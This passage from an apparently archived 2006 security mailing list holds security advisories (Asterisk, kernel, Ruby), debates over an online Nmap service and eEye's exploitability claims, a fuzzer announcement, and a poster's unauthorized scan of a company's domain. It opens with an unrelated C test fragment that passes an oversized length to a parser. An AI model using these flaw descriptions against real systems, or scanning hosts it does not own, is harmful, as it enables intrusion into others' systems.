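int oversized_sample_status(void)
{
    unsigned char buf[128];
    uint32_t d, r;
    size_t n = build_sample(buf, sizeof buf, 0xFFFFFFF0u, 0x20u, 40);
    return n ? binhex_check_forks(buf, n, &d, &r) : -99;
}
```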
From cowboy at cavein.org Wed Dec 6 04:55:52 2006
From: cowboy at cavein.org (Richard A Nelson)
Date: Tue, 5 Dec 2006 20:55:52 -0800 (PST)
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References:
Message-ID:

On Wed, 6 Dec 2006, Greg wrote:

> I don't wish to upset anyone but that answer has to be the craziest FIRST
> "port of call" approach I have seen used. I get plenty of those sorts of
> calls. I take about 30 seconds time on the phone for almost all of them. I
> say "Pull the power plug out of the router. Wait 10 seconds, plug it back in
> and wait another 10 seconds. OK, try now" and almost all of them report it
> works well.

That is heavily target market specific... Whilst I offer the same line to some friends and family, others I wouldn't dare start there (out of respect - they've already done everything obvious before asking for help).

> Besides, wouldn't it be just as easy to use the Nmap sitting on my computer
> if I decided I needed to use it?

If only it was always that easy... I just moved, and whilst the ISP is the same, the CLEC is new - new lines, new IP, some newer software, etc. I need to verify *my* setup, so:

* my local nmap is useless
* my work boxen are heavily firewalled - even outbound
* my accounts elsewhere usually don't have nmap available to non-admins (and I shy from that role unless needed).

So... For me, this has been a great service, and I'm sure I'm not alone.

--
Rick Nelson
Life'll kill ya          -- Warren Zevon
Then you'll be dead      -- Life'll kill ya

From edcarp at gmail.com Wed Dec 6 05:00:30 2006
From: edcarp at gmail.com (Ed Carp)
Date: Tue, 5 Dec 2006 22:00:30 -0700
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References: <1b0d006c0612051905h39ce657bh214cf60a48be253d@mail.gmail.com>
Message-ID: <1b0d006c0612052100p5e9f86a2uf3946a9b860939d4@mail.gmail.com>

On 12/5/06, Greg wrote:
> I don't wish to upset anyone but that answer has to be the craziest FIRST
> "port of call" approach I have seen used. I get plenty of those sorts of

Who said it was the first thing that was tried? And you just can't pull the plug on a router in a production shop.

From noodle.mastah at gmail.com Tue Dec 5 20:36:45 2006
From: noodle.mastah at gmail.com (chinese soup)
Date: Tue, 5 Dec 2006 21:36:45 +0100
Subject: [Full-disclosure] eEye's Zero-Day Tracker Launch
Message-ID:

http://eeyeresearch.typepad.com/blog/
http://research.eeye.com/html/alerts/zeroday/index.html

"If something is reported as a non-exploitable bug, we'll make sure to exhaust the flaw for exploitability, as we have shown with the ASX Playlist and the ADODB.Connection ActiveX zero-day vulnerabilities."

Or.. FUD?

1.) Adobe ActiveX
http://research.eeye.com/html/alerts/zeroday/20061128.html

"Although there was no supplied proof of concept for these vulnerabilities, releasing the method names as well as the fact that they are 'memory corruption' errors and 'could be exploited by attackers to take complete control of an affected system' without a vendor-supplied patch will put many Adobe users at risk."

And..

"Remote Code Execution: Yes"

Now wait a second, I thought that you guys were going to "make sure to exhaust the flaw for exploitability"? Did you actually try this out that you can say Remote Code Execution is possible?

2.) ASX Playlist
http://research.eeye.com/html/alerts/zeroday/20061122.html

Now this is fun.

"Severity: High
Remote Code Execution: Yes"

"As a result, a two- or four-byte heap overflow is possible if the "REF HREF" URL features a protocol shorter than three characters (the length of "mms")."

Ok. But wait, what's this sentence doing here:

"Exploitability due to the corruption of the adjacent heap block's header has not yet been demonstrated but is assumed likely."

So... you ASSUMED that it is likely, even though you can only have up to a 4-byte overwrite which does not overwrite the needed pointers in order to actually exploit this, yet you say "Yes" in Remote Code Execution?
trippin-out,
"noodles for long life!"

From mail4anub15 at gmail.com Wed Dec 6 07:24:59 2006
From: mail4anub15 at gmail.com (aNub15)
Date: Wed, 6 Dec 2006 08:24:59 +0100
Subject: [Full-disclosure] Hail list!
Message-ID: <001a01c71907$a4d0c7c0$ee725740$@com>

Hail list...

Could someone with a bit more experience (than me) please verify a few things. I came across a job listing yesterday (sys admin) for a Norwegian company called rubrikk.no. The guy who posted it clearly knows nothing about computers, talking about Windows server 2005, and maintaining perl and reg.ex servers (go figure). I ran a quick scan on the domain and found 54 vulns! (GFI Languard) Netcraft says BSD, but why then is he talking about Winblows. Please tell me I found a honeypot? If not, please shut down the computer, it should not be on the internet!!!

----

I also have a couple of questions about software firewalls/routers:

1. M0n0wall or SmoothWall?

2. Looking for a low footprint windows firewall that's only supposed to do one thing. If someone hits port 110, block the IP for a week? (should take care of most portscanners (skiddies)). And no, I'm not worried about blocking real users on the box.
Regards
Simon
www.supernoia.com

From joey at infodrom.org Wed Dec 6 11:55:43 2006
From: joey at infodrom.org (Martin Schulze)
Date: Wed, 6 Dec 2006 12:55:43 +0100 (CET)
Subject: [Full-disclosure] [SECURITY] [DSA 1229-1] New Asterisk packages fix arbitrary code execution
Message-ID: <20061206115543.9AF9DFDE1@finlandia.home.infodrom.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1229-1                    security at debian.org
http://www.debian.org/security/                             Martin Schulze
December 6th, 2006                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : asterisk
Vulnerability  : integer overflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-5444
CERT advisory  : VU#521252
BugTraq ID     : 20617

Adam Boileau discovered an integer overflow in the Skinny channel driver in Asterisk, an Open Source Private Branch Exchange or telephone system, as used by Cisco SCCP phones, which allows remote attackers to execute arbitrary code.

For the stable distribution (sarge) this problem has been fixed in version 1.0.7.dfsg.1-2sarge4.

For the unstable distribution (sid) this problem has been fixed in version 1.2.13~dfsg-1.

We recommend that you upgrade your asterisk packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4.dsc Size/MD5 checksum: 1259 2441c1ccc8467ecefc45b58711b9602f http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4.diff.gz Size/MD5 checksum: 70588 17c8aaae715230d9ea8d0485eb7cfe95 http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1.orig.tar.gz Size/MD5 checksum: 2929488 0d0f718ccd7a06ab998c3f637df294c0 Architecture independent components: http://security.debian.org/pool/updates/main/a/asterisk/asterisk-config_1.0.7.dfsg.1-2sarge4_all.deb Size/MD5 checksum: 61616 84dd16720f492033c5c034b69f033f7f http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dev_1.0.7.dfsg.1-2sarge4_all.deb Size/MD5 checksum: 83382 0fda6ac9d47e7d5bcd9786c7ab17ebd5 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-doc_1.0.7.dfsg.1-2sarge4_all.deb Size/MD5 checksum: 1577766 a5ddadc5ba22723d32a74a2bc4fb9dfc http://security.debian.org/pool/updates/main/a/asterisk/asterisk-sounds-main_1.0.7.dfsg.1-2sarge4_all.deb Size/MD5 checksum: 1180298 bf9fae8e20a5e299d1c24e5fce59ee96 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-web-vmail_1.0.7.dfsg.1-2sarge4_all.deb Size/MD5 checksum: 28378 eb425bfc6db224dd17346c0a03f06853 Alpha architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_alpha.deb Size/MD5 checksum: 1477714 2835395f4796f717330ec4bc6decca4e http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_alpha.deb Size/MD5 checksum: 31406 03e9021f5867a19500fadd3e27563e47 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_alpha.deb Size/MD5 checksum: 21444 06a45fc8f1407adfdcaf1453e1cd0874 AMD64 architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_amd64.deb Size/MD5 
checksum: 1333338 73a991fc324d71d53a375dd81b9eb8e2 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_amd64.deb Size/MD5 checksum: 30832 21bde76d77e7948ec115c0752e025353 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_amd64.deb Size/MD5 checksum: 21444 c426ea519c9a806039aec64fc58083fc ARM architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_arm.deb Size/MD5 checksum: 1262870 4e73f23ddaadabb52c1f06b37e1c520e http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_arm.deb Size/MD5 checksum: 29544 7d7f780f79006309910f2f6a66e06818 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_arm.deb Size/MD5 checksum: 21444 e50e31d85cc4835fc0023b02d4a19b39 HP Precision architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_hppa.deb Size/MD5 checksum: 1448202 32dd05dd323f87a5e2af536e49985faa http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_hppa.deb Size/MD5 checksum: 31476 46142d857caf78277934f9e89711b41a http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_hppa.deb Size/MD5 checksum: 21450 56f2cebadeabe4f099cf9399f55a589f Intel IA-32 architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_i386.deb Size/MD5 checksum: 1171606 2810bc5ffb85764e07e7ec706dc4f928 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_i386.deb Size/MD5 checksum: 29836 0daf81e64c836885f14b2dbf0f54343b http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_i386.deb Size/MD5 checksum: 21442 b0a56bf68687633b5965fd5bc48ada95 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_ia64.deb 
Size/MD5 checksum: 1771294 ed00a12ab45bd6f81da7214fc4f0b99d http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_ia64.deb Size/MD5 checksum: 32960 4f4e2c882189638bfee0f4e25868ab2b http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_ia64.deb Size/MD5 checksum: 21442 1b642cf09597da3404c55d42b6ff0ae7 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_m68k.deb Size/MD5 checksum: 1184854 de5fd7c0533e64861c7446c651777fd3 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_m68k.deb Size/MD5 checksum: 30224 0967fd0088ec26799999c267a258bb81 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_m68k.deb Size/MD5 checksum: 21462 5d19189f30b74bd2112d09a340946cf9 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_mips.deb Size/MD5 checksum: 1264012 fabd550d77fe25c7e717f29bb3bf1355 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_mips.deb Size/MD5 checksum: 29430 efd332bdb454dc03e3e2dc63bdd65ce8 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_mips.deb Size/MD5 checksum: 21448 ff71d10748a00ef5f1c3d4b8632d929f Little endian MIPS architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_mipsel.deb Size/MD5 checksum: 1270346 07d3e2bc2677a460f27187264fafe80e http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_mipsel.deb Size/MD5 checksum: 29366 49499b7916c27d1ede70eddc64505be0 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_mipsel.deb Size/MD5 checksum: 21450 530e7eb9d1a395faa2fd19dffaf2db6e PowerPC architecture: 
http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_powerpc.deb Size/MD5 checksum: 1425172 dae96f2c81168d452cd05b70316632db http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_powerpc.deb Size/MD5 checksum: 31166 86982177ea3ab8dd23daa989e976c316 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_powerpc.deb Size/MD5 checksum: 21444 fafe504d906ab206c8c66c558ca866c5 IBM S/390 architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_s390.deb Size/MD5 checksum: 1312516 8b8425df65ae5d632b0f8f1da6fb4c38 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_s390.deb Size/MD5 checksum: 30846 1ab2adb0c24b96a0c8a43480cd0a5f68 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_s390.deb Size/MD5 checksum: 21442 0e283bcb7f6c4992e99ae7f823c557f3 Sun Sparc architecture: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.0.7.dfsg.1-2sarge4_sparc.deb Size/MD5 checksum: 1274282 aa531e9c0c268dfabf222092b5b61e51 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-gtk-console_1.0.7.dfsg.1-2sarge4_sparc.deb Size/MD5 checksum: 29812 3a64e2bccfc0479263d2aa8d00b2cb68 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.0.7.dfsg.1-2sarge4_sparc.deb Size/MD5 checksum: 21450 c9f916ccce73e0c25360affd739543e5 These files will probably be moved into the stable distribution on its next update. 
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFdq++W5ql+IAeqTIRAoTLAKCr+6Dr+P2PbVVM2p1aKcdCUIrlagCeK+QC
/J3Yurq3X4CBeFGRSXpAeTc=
=AMcA
-----END PGP SIGNATURE-----

From schalulleke at gmail.com Wed Dec 6 08:11:03 2006
From: schalulleke at gmail.com (Schanulleke)
Date: Wed, 06 Dec 2006 09:11:03 +0100
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References:
Message-ID: <45767B17.9000103@gmail.com>

Simon Smith wrote:
> Why would you do this?
>
>> For all Nmap fans, our group have implemented Nmap Online service.
>> Its address is http://nmap-online.com/. The interface allows you to perform
>> custom

Because you like lawyers and being in court?

From timo.schoeler at riscworks.net Wed Dec 6 12:07:46 2006
From: timo.schoeler at riscworks.net (Timo Schoeler)
Date: Wed, 06 Dec 2006 13:07:46 +0100
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <45767B17.9000103@gmail.com>
References: <45767B17.9000103@gmail.com>
Message-ID: <4576B292.3020809@riscworks.net>

thus Schanulleke spake:
> Simon Smith wrote:
>> Why would you do this?
>>
>>> For all Nmap fans, our group have implemented Nmap Online service.
>>> Its address is http://nmap-online.com/. The interface allows you to perform
>>> custom
>
> Because you like lawyers and being in court?
lawyers are wimps :)

From joxeankoret at yahoo.es Wed Dec 6 13:18:55 2006
From: joxeankoret at yahoo.es (Joxean Koret)
Date: Wed, 06 Dec 2006 14:18:55 +0100
Subject: [Full-disclosure] Oracle PL/SQL Fuzzing Tool
Message-ID: <1165411136.11029.12.camel@localhost.localdomain>

Hi to all,

In the past I wrote a python tool to fuzz PL/SQL procedures, functions and packages. With this wonderful tool I found many vulnerabilities, many crashes and many, many interesting issues. I decided to release it to the public because it's a part of an Oracle-specific Vulnerability Assessment Tool I will release when it's completely finished. It will be licensed under the GPL.

To use the attached python tool you will need a valid Oracle database account with, at least, the CREATE SESSION privilege granted. You will need to adapt it to your needs to fuzz a database under your control. At least: username, password, Oracle SID and IP address.

It only fuzzes 'VARCHAR2', 'RAW', 'NCHAR', 'BINARY_INTEGER', 'BINARY_FLOAT', 'CHAR', 'NVARCHAR2', 'NUMBER', 'FLOAT' and 'LONG RAW' datatypes, at the moment, but you can easily adapt it to fuzz other Oracle datatypes, even user defined.

Well, if you find it interesting or if you have any question about it, any criticism, etc... Don't hesitate to contact me.

Have fun.

---
Joxean Koret

-----------------------------------
Perhaps, perhaps, one day the true Zuberoans, the true Basques, will rise up to kill the foreign tyrants and give back to its people the land our fathers' fathers left them.
-----------------------------------

Attachment: oldfuzzer.py (text/x-python, 7954 bytes)
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061206/99331b9e/attachment.py
From sniffhog at yahoo.com Wed Dec 6 15:02:44 2006
From: sniffhog at yahoo.com (Reece Mills)
Date: Wed, 6 Dec 2006 07:02:44 -0800 (PST)
Subject: [Full-disclosure] Another former 'hacker' now 'security guru'
Message-ID: <20061206150244.48845.qmail@web55004.mail.re4.yahoo.com>

f8 labs' very own eric 'loki' hines goes national...

http://www.foxnews.com/video2/launchPage.html?120406/120406_cav_hines&Cyber%20Security&Your_World&Former%20computer%20hacker%3A%20Al%20Qaeda%20can%20pull%20off%20cyber%20attack&Your%20World&-1&Cyber%20Security&Video%20Launch%20Page&Business

From announce-noreply at rpath.com Wed Dec 6 17:10:29 2006
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Wed, 06 Dec 2006 12:10:29 -0500
Subject: [Full-disclosure] rPSA-2006-0226-1 kernel
Message-ID: <4576f985.Gu8hm2wuXwNVRhz3%announce-noreply@rpath.com>

rPath Security Advisory: 2006-0226-1
Published: 2006-12-06
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
    Local Root Non-deterministic Privilege Escalation
Updated Versions:
    kernel=/conary.rpath.com at rpl:devel//1/2.6.17.14-0.4-1
    kernel=/conary.rpath.com at rpl:devel//1-xen/2.6.16.29-0.11-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5751
    https://issues.rpath.com/browse/RPL-803
    https://issues.rpath.com/browse/RPL-837

Description:
    Previous versions of the kernel package are vulnerable to a local denial of service or privilege escalation attack by unprivileged users if any network
bridge interface has been configured with more than two interfaces. The attacker can cause the system to crash, and is believed to be able to provide arbitrary code that may (with undetermined probability) run in kernel context. Xen dom0 instances in the default bridging configuration are vulnerable.

    Previous versions of the Xen dom0 kernel did not embed the firmware for QLogic 2XXX Fibre Channel adapters, disabling Xen dom0 on those systems.

    This update requires a system reboot to implement the fixes.

From full-disclosure at kharkerlake.net Wed Dec 6 18:21:44 2006
From: full-disclosure at kharkerlake.net (Christian "Khark" Lauf)
Date: Wed, 06 Dec 2006 19:21:44 +0100
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References:
Message-ID: <45770A38.3040508@kharkerlake.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

Greg wrote:
> I don't wish to upset anyone but that answer has to be the craziest FIRST
> "port of call" approach I have seen used. I get plenty of those sorts of
> calls. I take about 30 seconds time on the phone for almost all of them. I
> say "Pull the power plug out of the router. Wait 10 seconds, plug it back in
> and wait another 10 seconds. OK, try now" and almost all of them report it
> works well.

What about the people whose router configuration (which was done by a friend months/years ago) you just reset? Better prepare for some house visits to restore SOHO router configurations :-)

And I think that the more you know about a certain topic, the more you are able to find nice & half-decent solutions. Resetting the whole device just because of what is maybe a temporary problem doesn't seem clever to me.

But I understand your point.. At some point in time first level support gets boring.
Regards,
Christian

- -- 
Christian "Khark" Lauf
GPG: 0x6AADC60A | IRCnet/silcnyet: Khark
silcnyet-Fingerprint: 82DA 447F B957 1E18 82EC 44B7 1800 CC3C 0EDE 6DCA
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (MingW32)

iD4DBQFFdwo4AaLWKGqtxgoRAuh2AJdpFYr/jK1AA4J00HgFedIgDrJvAJ0UnxbQ
I8Xie+CGT9qOUvKv0WeanA==
=lWLi
-----END PGP SIGNATURE-----

From security at mandriva.com Wed Dec 6 19:02:00 2006
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 6 Dec 2006 12:02:00 -0700
Subject: [Full-disclosure] [ MDKSA-2006:225 ] - Updated ruby packages fix DoS vulnerability
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2006:225
http://www.mandriva.com/security/
_______________________________________________________________________

Package : ruby
Date    : December 6, 2006
Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0
_______________________________________________________________________

Problem Description:

Another vulnerability has been discovered in the CGI library (cgi.rb) that ships with Ruby which could be used by a malicious user to create a denial of service attack (DoS).

Updated packages have been patched to correct this issue.
_______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6303 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: cf4eb0abe6d54c41a9b7e94adbd894ab 2006.0/i586/ruby-1.8.2-7.5.20060mdk.i586.rpm 42a501b32ad7f9c1140d2665a8c35bdf 2006.0/i586/ruby-devel-1.8.2-7.5.20060mdk.i586.rpm fadf1005a3cecb41da322d6472023562 2006.0/i586/ruby-doc-1.8.2-7.5.20060mdk.i586.rpm 6754c4c9f5047d032a15819820595fcb 2006.0/i586/ruby-tk-1.8.2-7.5.20060mdk.i586.rpm fb133b0d4f1b5eb27e67f0eb39772564 2006.0/SRPMS/ruby-1.8.2-7.5.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: a68db589ace220742904a49587e65087 2006.0/x86_64/ruby-1.8.2-7.5.20060mdk.x86_64.rpm 7f14ec97214b7f501c7bcd8963ad2b0a 2006.0/x86_64/ruby-devel-1.8.2-7.5.20060mdk.x86_64.rpm 5b6604fd9628a2312ee2b7f3b4371f45 2006.0/x86_64/ruby-doc-1.8.2-7.5.20060mdk.x86_64.rpm ba38430b90e8b454c7b2228073c4d3dd 2006.0/x86_64/ruby-tk-1.8.2-7.5.20060mdk.x86_64.rpm fb133b0d4f1b5eb27e67f0eb39772564 2006.0/SRPMS/ruby-1.8.2-7.5.20060mdk.src.rpm Mandriva Linux 2007.0: b126d91632869a7a659f7044cbca180c 2007.0/i586/ruby-1.8.5-2.2mdv2007.0.i586.rpm a1414e09dcb3d0c858e3fc5070608e47 2007.0/i586/ruby-devel-1.8.5-2.2mdv2007.0.i586.rpm d6bf66762039af18a6c5f0a8b27d2bfa 2007.0/i586/ruby-doc-1.8.5-2.2mdv2007.0.i586.rpm 017468bee38279e7f42adad194866cff 2007.0/i586/ruby-tk-1.8.5-2.2mdv2007.0.i586.rpm 45e958263f67f96797318621052f1e3f 2007.0/SRPMS/ruby-1.8.5-2.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 2721a9103870075c0e64dd1a7c01b9a5 2007.0/x86_64/ruby-1.8.5-2.2mdv2007.0.x86_64.rpm 6b6bd12e97b4ddf070849603bea45623 2007.0/x86_64/ruby-devel-1.8.5-2.2mdv2007.0.x86_64.rpm 2e163941297e43e62d2f798a93efe960 2007.0/x86_64/ruby-doc-1.8.5-2.2mdv2007.0.x86_64.rpm d953012dc537a4f6e8343138d8f32f31 2007.0/x86_64/ruby-tk-1.8.5-2.2mdv2007.0.x86_64.rpm 45e958263f67f96797318621052f1e3f 2007.0/SRPMS/ruby-1.8.5-2.2mdv2007.0.src.rpm Corporate 3.0: 
95abd86462f84450392cd41ab5946666 corporate/3.0/i586/ruby-1.8.1-1.8.C30mdk.i586.rpm 174fe6c12a1a6a7dbf03f755cf0a57cd corporate/3.0/i586/ruby-devel-1.8.1-1.8.C30mdk.i586.rpm 2d0e7d3f950e7040f6e6c19a921bdb78 corporate/3.0/i586/ruby-doc-1.8.1-1.8.C30mdk.i586.rpm 37fe39a689b25aa2caf193994a5dbf05 corporate/3.0/i586/ruby-tk-1.8.1-1.8.C30mdk.i586.rpm 71b024abd10b00f7e278e39492f98aa6 corporate/3.0/SRPMS/ruby-1.8.1-1.8.C30mdk.src.rpm Corporate 3.0/X86_64: 366a4003551813d500eec00996981abf corporate/3.0/x86_64/ruby-1.8.1-1.8.C30mdk.x86_64.rpm ef95e042be0f3a881ae6a66502c1c905 corporate/3.0/x86_64/ruby-devel-1.8.1-1.8.C30mdk.x86_64.rpm d72e56164f0a0fcb99b190dbb2ce7c2c corporate/3.0/x86_64/ruby-doc-1.8.1-1.8.C30mdk.x86_64.rpm 81c6c9a396d26dea3bd683c2207eb96b corporate/3.0/x86_64/ruby-tk-1.8.1-1.8.C30mdk.x86_64.rpm 71b024abd10b00f7e278e39492f98aa6 corporate/3.0/SRPMS/ruby-1.8.1-1.8.C30mdk.src.rpm Corporate 4.0: 9796f3458efc694c98ab821158a0599b corporate/4.0/i586/ruby-1.8.2-7.5.20060mlcs4.i586.rpm 3578dc2bd6735967f79f43b21b14f8b2 corporate/4.0/i586/ruby-devel-1.8.2-7.5.20060mlcs4.i586.rpm 4505b6152a025ecef599e48c4ef11763 corporate/4.0/i586/ruby-doc-1.8.2-7.5.20060mlcs4.i586.rpm 466b48eb68199179c044b8a0fe5f7a3f corporate/4.0/i586/ruby-tk-1.8.2-7.5.20060mlcs4.i586.rpm b7f41e2f4f5f71e3c2f214c041957533 corporate/4.0/SRPMS/ruby-1.8.2-7.5.20060mlcs4.src.rpm Corporate 4.0/X86_64: 2771fffe29e377ea0bcf594bb94a0f7b corporate/4.0/x86_64/ruby-1.8.2-7.5.20060mlcs4.x86_64.rpm 2d0b06a00590a0dfae303be8079f852a corporate/4.0/x86_64/ruby-devel-1.8.2-7.5.20060mlcs4.x86_64.rpm 87d597d03cc146b1b9ac89e29b7a2879 corporate/4.0/x86_64/ruby-doc-1.8.2-7.5.20060mlcs4.x86_64.rpm ec2d09506bfebab08d523fd258f8136b corporate/4.0/x86_64/ruby-tk-1.8.2-7.5.20060mlcs4.x86_64.rpm b7f41e2f4f5f71e3c2f214c041957533 corporate/4.0/SRPMS/ruby-1.8.2-7.5.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. 
The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFduZamqjQ0CJFipgRAv9iAKDPZ8d8ORe8hjsnV+kvVFm9ZHsZZwCcD/PC
3qAszwS/61EmGp8G9xExGA8=
=cEew
-----END PGP SIGNATURE-----

From full-disclosure3 at pchandyman.com.au Wed Dec 6 20:41:09 2006
From: full-disclosure3 at pchandyman.com.au (Greg)
Date: Thu, 7 Dec 2006 07:41:09 +1100
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <45770A38.3040508@kharkerlake.net>
Message-ID:

> -----Original Message-----
> From: Christian "Khark" Lauf [mailto:full-disclosure at kharkerlake.net]
> Sent: Thursday, 7 December 2006 5:22 AM
> To: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] Nmap Online
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hi,
>
> Greg wrote:
>
> > I don't wish to upset anyone but that answer has to be the craziest
> > FIRST "port of call" approach I have seen used. I get plenty of those
> > sorts of calls. I take about 30 seconds time on the phone for almost
> > all of them. I say "Pull the power plug out of the router. Wait 10
> > seconds, plug it back in and wait another 10 seconds. OK, try now" and
> > almost all of them report it works well.
>
> What about the people whose router configuration (which was
> done by a friend months/years ago) you just reset?
> Better prepare for some house visits to restore SOHO router
> configurations :-)

I am fairly certain that the NV in NV-RAM doesn't mean "New Victim" but "Non Volatile". E.g., even if nothing else works so you pull the plug and put it back in, the settings you have changed remain intact. So, in most cases, no, you do not need to worry when pulling the plug.

> And I think that the more you know about a certain topic, the
> more you are able to find nice & half-decent solutions.
> Resetting the whole device just because of what is maybe a
> temporary problem doesn't seem clever to me.

That wasn't what I said, of course. The whole point was that if the user is complaining about not getting email from their ISP via whatever method they decide to use and/or cannot get onto the web, then pulling the power plug is a viable answer that is normally correct in most situations. Sure, there are some where it isn't the answer, but if you find out it is still as bad as it ever was after pulling the plug and putting it back in, then you need to go there, physically, in any case.

> But I understand your point.. At some point in time first
> level support gets boring.

